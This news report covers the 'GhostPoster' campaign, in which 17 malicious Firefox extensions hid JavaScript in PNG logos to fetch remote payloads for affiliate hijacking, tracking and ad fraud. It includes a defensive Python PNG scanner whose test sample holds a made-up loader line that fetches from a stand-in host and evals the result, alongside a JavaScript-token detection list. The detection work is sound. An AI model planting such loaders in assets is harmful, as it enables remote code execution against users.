- Koi Security discovered 17 malicious Firefox extensions that concealed backdoors and tracking code, downloaded more than 50,000 times.
- The extensions extracted payloads from remote servers, hijacked affiliate links, injected trackers, stripped security headers, and activated ad fraud mechanisms.
- Mozilla has removed all affected add-ons and updated its detection systems; users should uninstall them and secure their accounts.
More than a dozen Firefox extensions have been found to be malicious, implementing backdoors and keeping track of users’ browsing habits, experts have warned.
That’s according to security researchers at Koi Security, who named the campaign “GhostPoster” and said some of these extensions have a rather unusual way of retrieving their malicious code.
In total, these extensions have been downloaded more than 50,000 times.
Hijacking Affiliate Links
Here is the full list of those found so far:
Free VPN forever
screenshot-recorded-easy
best weather forecast
crxmouse-gesture
fast site loader and cache
free mp3 downloader
google-translate-right-click
google-translator-esp
Global VPN
dark reader for ff
translator-gbbd
I like the weather
extension-google-translate-pro
谷歌-翻译
libretv-watch-free-videos
stop ads
right click-google-translate
Some of these extensions actually store malicious JavaScript code inside their PNG logo. That code serves as instructions for downloading the main payload from a remote server. To make detection and attribution more difficult, the attackers made the extensions download the main payload only 10% of the time.
The main payload can do all sorts of things. Above all, it hijacks affiliate links on major e-commerce sites, thereby stealing money directly from content creators.
Then it injects Google Analytics tracking into every page the user visits and removes security headers from all HTTP responses.
Finally, it can bypass CAPTCHA using three separate mechanisms and inject invisible iframes, mainly used for ad fraud, click fraud and tracking. These iframes self-destruct after about 15 seconds.
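A defender-side check for the PNG trick described above, added here as an example and not code from Koi Security, Mozilla or the extensions themselves: it walks a PNG chunk by chunk and flags bytes appended after the IEND chunk, as well as chunk contents (raw or zlib-inflated) that contain JavaScript-looking tokens. The report does not say exactly how the code was embedded in the logo, so the appended-data and text-chunk cases, the token list, and the constructed sample PNG are assumptions.

```python
import struct
import zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Tokens that have no business inside pixel or metadata bytes (heuristic, not exhaustive).
JS_TOKENS = (b"function(", b"fetch(", b"XMLHttpRequest", b"eval(", b"document.", b"browser.", b"chrome.")

def make_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF  # PNG CRC covers type + payload
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def walk_png(data):
    """Parse chunks up to IEND. Returns ([(type, payload), ...], bytes_after_IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            break  # truncated or bogus length: stop instead of reading past the file
        chunks.append((ctype, data[pos + 8:end - 4]))
        pos = end
        if ctype == b"IEND":
            return chunks, data[pos:]
    return chunks, b""  # no IEND reached

def looks_like_script(blob):
    """True if the raw bytes, or their zlib-inflated form (IDAT, zTXt), contain JS tokens."""
    try:
        views = (blob, zlib.decompress(blob))
    except zlib.error:
        views = (blob,)
    return any(tok in view for view in views for tok in JS_TOKENS)

def scan_png(data):
    """Findings for one PNG: bytes appended after IEND and script-like chunk contents."""
    chunks, trailing = walk_png(data)
    findings = []
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND" + (" (script-like)" if looks_like_script(trailing) else ""))
    for ctype, payload in chunks:
        if looks_like_script(payload):
            findings.append(f"script-like content in {ctype.decode('latin-1')} chunk")
    return findings

# Constructed inputs (not real assets): a 1x1 grey PNG, optional extra chunks before IDAT, bytes after IEND.
SAMPLE_JS = b"fetch('https://example.invalid/p').then(r=>r.text()).then(eval)"  # made-up loader string
def build_png(extra=b"", trailing=b""):
    ihdr = make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))  # 1x1, 8-bit greyscale
    return PNG_SIG + ihdr + extra + make_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + make_chunk(b"IEND", b"") + trailing
```

Run `scan_png()` over every image in an unpacked extension directory; a clean logo should return an empty list, and anything reported deserves a manual look before the extension is trusted.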
While stealing money from affiliates and monitoring user behavior is serious business, researchers warned that the campaign could become even more destructive at any time if attackers decide to start harvesting passwords or redirecting users to fake banking login pages and similar phishing sites.
After the news broke, Mozilla investigated the report and decided to remove all discovered extensions from its browser store.
“Our add-ons team has investigated this report and has therefore taken action to remove all of these extensions from AMO,” the company told BleepingComputer. “We have updated our automated systems to detect and block extensions using similar attacks now and in the future. We continue to improve our systems as new attacks emerge.”
If you are using one of these extensions, you should remove it immediately and secure your critical accounts.
Via BleepingComputer